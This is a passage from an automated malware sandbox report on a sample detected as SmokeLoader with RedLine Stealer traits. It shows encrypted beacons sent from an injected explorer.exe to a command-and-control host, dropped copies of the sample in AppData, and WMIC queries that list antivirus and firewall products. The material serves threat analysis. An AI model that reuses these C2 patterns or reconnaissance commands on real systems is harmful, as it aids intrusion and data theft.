2024-09-30 13:38:56 UTC	316	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 62 34 01 83 b6 25 93 3c 47 bf 17 b9 8e aa 09 56 a2 1c 1b 85 38 f3 c4 30 6d cb 0d 16 2b aa b9 92 23 d9 d6 08 77 80 88 4a b9 25 2d a8 d6 5a 14 42 69 09 1a c2 2a 80 cf d7 05 cf 91 63 0e 02 eb 67 48 f6 4e 1d c3 9d ea c0 54 75 81 56 e4 76 b6 6f 5f 9e 59 a7 31 4c 43 67 63 c7 f3 5a 91 89 16 99 4b 1a 91 be dd 19 b3 87 71 96 df eb d2 15 60 88 82 b4 04 15 de 70 5d 9f 04 07 19 fb 59 7c 36 fa 02 03 0f ee 8d 8e 23 59 80 ed 00 8a 7f ce bb a0 70 34 0d 43 cd 1b 03 08 4e 10 c3 16 be 84 7f 48 28 49 54 83 8b 7f 65 27 37 8f 9a e0 48 85 c4 1e d2 27 a5 93 b4 81 5f c3 4e Data Ascii: ryid8a(f\|5r2,)%P g3iqH[ALb4%<GV80m+#wJ%-ZBi*cgHNTuVvo_Y1LCgcZKq`p]Y\|6#Yp4CNH(ITe'7H'_N
2024-09-30 13:38:56 UTC	287	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:38:56 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-09-30 13:38:56 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49749	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:57 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://gklmvitduapshup.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 367 Host: calvinandhalls.com
2024-09-30 13:38:57 UTC	367	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 33 f3 16 9e d7 ec 1f 04 db 74 60 b5 3b d4 8c 7f 18 e0 74 27 74 be c4 d1 76 b6 e7 0d 11 f3 8d 5f 84 5e 38 90 d9 14 34 61 02 21 3f fc 0e d6 98 82 0a c0 89 30 06 5d b0 4d 20 bb 30 41 9b d8 b3 a8 5b 33 96 10 a1 58 8e 27 52 df 46 d8 4f 36 34 35 00 bd b7 5f f3 96 1c e1 5f 28 91 e4 84 44 a7 9b 17 9f c0 f9 83 1f 29 95 a5 dc 71 35 c3 0e 3c f6 64 70 39 fd 2f 17 38 a6 3f 78 5b 9d 8d 91 05 4c 99 d0 1d 88 66 9f f2 da 78 7b 02 29 c1 4a 14 0d 48 67 d2 09 b8 d1 7c 1d 1a 27 42 9f b1 66 42 34 24 a8 fd ed 39 86 de 3e fd 63 d3 fd f6 c7 79 de 73 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Lc4%<3t`;t'tv_^84a!?0]M 0A[3X'RFO645__(D)q5<dp9/8?x[Lfx{)JHg\|'BfB4$9>cys
2024-09-30 13:38:57 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:57 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49750	23.145.40.162	443	1012	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:39:03 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://calvinandhalls.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 501 Host: calvinandhalls.com
2024-09-30 13:39:03 UTC	501	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad 86 1e d8 39 7b ec e1 b1 3a c4 82 74 bf a9 ae b0 3c 40 b1 a9 83 68 08 b6 4f 33 ef 1c 56 37 92 4c 30 54 db 10 16 27 d8 9a c1 22 28 9e f1 4d c6 4d f9 a5 fd 3d 62 78 55 c1 69 0d 6d 2e 12 ea 19 9d a6 13 37 17 43 39 f8 98 43 6d 54 28 ab ee 99 39 f9 c9 6b f8 45 8a 9d d5 a4 7a b5 55 Data Ascii: ryid8a(f\|5r2nluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu\|9{:t<@hO3V7L0T'"(MM=bxUim.7C9CmT(9kEzU
2024-09-30 13:39:03 UTC	287	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:39:03 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-09-30 13:39:03 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49757	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:40:17 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://jefnxxqxuxib.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-09-30 13:40:17 UTC	109	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-30 13:40:17 UTC	285	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:40:17 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-09-30 13:40:17 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49759	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:40:37 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://npjscmvmupb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-09-30 13:40:37 UTC	109	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-30 13:40:37 UTC	285	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:40:37 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-09-30 13:40:37 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49761	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:40:59 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ipmfrunnoji.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-09-30 13:40:59 UTC	109	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-30 13:40:59 UTC	285	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:40:59 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-09-30 13:40:59 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49763	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:41:22 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://wwkvkysjcmxmifd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-09-30 13:41:22 UTC	109	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[CLk4%<2eQvb%;=j ,
2024-09-30 13:41:22 UTC	285	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:41:22 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-09-30 13:41:22 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Target ID:	0
Start time:	09:37:19
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\OCYe9qcxiM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OCYe9qcxiM.exe"
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	2A6994149BAFF1E680719F89062BFCC7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:37:30
Start date:	30/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	09:37:50
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\hehcrfb
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hehcrfb
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	2A6994149BAFF1E680719F89062BFCC7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:38:15
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Temp\4470.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4470.exe
Imagebase:	0x400000
File size:	245'248 bytes
MD5 hash:	D07C1E0124B1CFA23AA3699216AA912F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:38:44
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\fihcrfb
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\fihcrfb
Imagebase:	0x400000
File size:	245'248 bytes
MD5 hash:	D07C1E0124B1CFA23AA3699216AA912F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:38:54
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Temp\354F.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\354F.exe
Imagebase:	0x7ff780b60000
File size:	78'336 bytes
MD5 hash:	815279E7D757D334D6E9EF9B249CA705
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	09:38:55
Start date:	30/09/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6fed00000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:38:56
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe60000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:38:57
Start date:	30/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:38:58
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe60000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	09:39:00
Start date:	30/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:39:01
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xe60000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:39:02
Start date:	30/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff62d7d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	09:39:14
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd
Imagebase:	0x7ff7c2c50000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	09:39:14
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	09:39:15
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:39:17
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:39:19
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:39:20
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Imagebase:	0x7ff6cc730000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:39:22
Start date:	30/09/2024
